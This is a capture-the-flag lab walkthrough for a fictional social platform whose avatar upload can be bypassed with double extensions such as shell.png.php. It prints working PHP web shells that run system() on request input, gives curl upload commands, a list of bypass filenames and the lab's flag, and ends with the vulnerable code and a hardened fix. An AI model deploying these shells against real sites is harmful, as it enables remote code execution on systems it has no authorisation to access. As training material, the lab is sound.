Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
The SocialConnect platform has a flawed file validation mechanism in the avatar upload functionality. The code checks if the filename contains .png or .jpg anywhere in the name, rather than checking if it ends with these extensions. This allows double extensions like .png.php or .jpg.php to bypass the filter.
Navigate to <target-ip> to access SocialConnect.

Create a file named shell.png.php with the following content:
```php
<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    echo "Command: " . htmlspecialchars($_GET['cmd']) . "\n";
    echo "Output:\n";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "<h2>Web Shell Active</h2>";
    echo "<p>Add ?cmd=COMMAND to execute commands</p>";
    echo "<p>Example: ?cmd=cat /home/flag.txt</p>";
    echo "<form method='GET'>";
    echo "Command: <input type='text' name='cmd' placeholder='cat /home/flag.txt'>";
    echo "<input type='submit' value='Execute'>";
    echo "</form>";
}
?>
```
Alternatively, use avatar.jpg.php or a similar double extension. The file input has a client-side restriction (accept=".png,.jpg,.jpeg"), so you need to bypass it to select your .php file.
Edit the file input to remove the accept attribute:

```html
<!-- Original -->
<input type="file" class="form-control" id="avatar" name="avatar" accept=".png,.jpg,.jpeg" required="">
<!-- Modified (accept attribute removed) -->
<input type="file" class="form-control" id="avatar" name="avatar" required="">
```
Alternatively, rename the shell.png.php file to shell.png so the file picker accepts it, then submit it under the name shell.png.php.
Or upload it directly with curl:

```bash
# First, login and get session cookie
curl -c cookies.txt -d "username=youruser&password=yourpass" -X POST <target-ip>/login.php
# Upload the shell directly
curl -b cookies.txt -F "avatar=@shell.png.php" <target-ip>/profile.php
```
After uploading shell.png.php, the server stores the file as avatar_1_1234567890_shell.png.php under <target-ip>/uploads/avatars/.
Open the uploaded shell and run cat /home/flag.txt. Useful commands:

```bash
# Direct flag read
cat /home/flag.txt
# Search for flag files
find / -name "*flag*" 2>/dev/null
# List home directory
ls -la /home/
# Current directory and permissions
pwd && whoami
```
b14691a4-8b7f-4eb2-b1c8-8e9c53e36ffa
Alternative filenames that also pass the filter:

- shell.jpg.php
- avatar.png.php
- image.jpeg.php
- profile.jpg.php5
A minimal variant:

Filename: cmd.png.php

Content:

```php
<?php system($_GET['c']); ?>
```

Usage: cmd.png.php?c=cat /home/flag.txt
The vulnerable code in profile.php:

```php
$allowedExtensions = ['png', 'jpg', 'jpeg'];
$hasValidExtension = false;
foreach ($allowedExtensions as $ext) {
    if (strpos(strtolower($fileName), '.' . $ext) !== false) {
        $hasValidExtension = true;
        break;
    }
}
```

The flaw: strpos() checks whether .png/.jpg appears anywhere in the filename, not just at the end. This allows files like 'shell.png.php' to pass validation.
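As an added example (not the lab's own code), the flawed check above beside a hardened version: the extension is taken from the end of the name with pathinfo() and matched against an allowlist, the file content is sniffed with finfo, and the stored name is chosen by the server rather than taken from the client. The filenames in the demonstration loop are constructed.

```php
<?php
// Added example, not the lab's code: the flawed check beside a hardened one.

// Flawed (as in profile.php): strpos() matches ".png" anywhere in the name,
// so "shell.png.php" passes and is later executed as PHP.
function flawedExtensionCheck(string $fileName): bool {
    foreach (['png', 'jpg', 'jpeg'] as $ext) {
        if (strpos(strtolower($fileName), '.' . $ext) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened: only the final extension counts, and it must be on the allowlist.
function hasAllowedExtension(string $fileName): bool {
    $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    return in_array($ext, ['png', 'jpg', 'jpeg'], true);
}

// Content check: sniff the bytes and map the detected type to an extension
// chosen by the server, so the stored name never comes from the client.
function extensionFromContent(string $tmpPath): ?string {
    $allowedMimeTypes = ['image/png' => 'png', 'image/jpeg' => 'jpg'];
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime = finfo_file($finfo, $tmpPath);
    finfo_close($finfo);
    return $allowedMimeTypes[$mime] ?? null;
}

// Server-chosen storage name: random token plus the sniffed extension.
function storedAvatarName(string $ext): string {
    return 'avatar_' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demonstration with constructed filenames (nothing is written to disk).
$names = ['avatar.png', 'shell.png.php', 'profile.jpg.php5', 'SHELL.PNG.PHP'];
foreach ($names as $n) {
    printf("%-18s flawed=%-6s hardened=%s\n", $n,
        flawedExtensionCheck($n) ? 'pass' : 'reject',
        hasAllowedExtension($n) ? 'pass' : 'reject');
}
```

The name check alone is not sufficient: the uploads directory should also be configured so the web server never executes scripts from it.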
This file upload bypass challenge demonstrates a common but critical vulnerability in web applications. By exploiting inadequate file validation, attackers can upload web shells and gain remote code execution capabilities. The double extension technique shown here is frequently encountered in real-world penetration testing scenarios and highlights the importance of implementing robust file upload security measures.